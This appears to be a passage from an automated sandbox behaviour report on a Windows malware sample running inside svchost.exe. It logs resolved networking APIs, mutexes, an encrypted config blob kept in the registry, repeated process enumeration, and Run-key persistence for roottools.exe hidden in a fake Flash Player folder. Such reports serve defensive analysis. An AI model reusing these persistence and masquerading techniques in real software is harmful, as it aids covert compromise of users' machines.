Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x75690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 True 1
Fn
System Get Info type = Operating System True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 True 1
Fn
Mutex Create mutex_name = 20BC29E135FB9B01285187E3B5593CC8 True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\azuqkihi, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\xekeov, type = file_attributes False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Thread 0x614
(Host: 416, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77ccfda0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Thread 0x718
(Host: 8, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = size, size_out = 196608 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608, size_out = 196608 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 1
Fn
Mutex Release mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 True 1
Fn
Thread 0x59c
(Host: 3, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0x60c
(Host: 3, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0x4f8
(Host: 9, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_NONE False 1
Fn
Thread 0x460
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
System Sleep duration = 20000 milliseconds (20.000 seconds) True 1
Fn
Process #20: upde25b4796.exe
(Host: 676, Network: 0)
+
Information Value
ID #20
File Name c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:05:18, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:04:55
OS Process Information
+
Information Value
PID 0x594
Parent PID 0x320 (c:\windows\syswow64\svchost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 548
0x 7D8
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000220000 0x00220000 0x00226fff Pagefile Backed Memory Readable True False False
